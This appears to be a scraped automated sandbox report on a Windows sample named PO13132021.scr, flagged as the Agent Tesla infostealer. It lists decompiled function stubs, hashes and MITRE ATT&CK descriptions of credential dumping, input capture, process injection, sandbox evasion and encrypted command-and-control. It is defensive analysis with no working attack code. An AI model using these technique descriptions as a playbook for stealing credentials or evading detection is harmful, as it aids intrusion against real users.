Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO13132021.scr

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00403461, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00403A3B, Relevance: 51.0, APIs: 14, Strings: 15, Instructions: 215
stringregistryCOMMON

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Function 004066A6, Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Function 00403949, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20
COMMON

Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00401F7B, Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 0040659C, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129
memorystringCOMMON

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre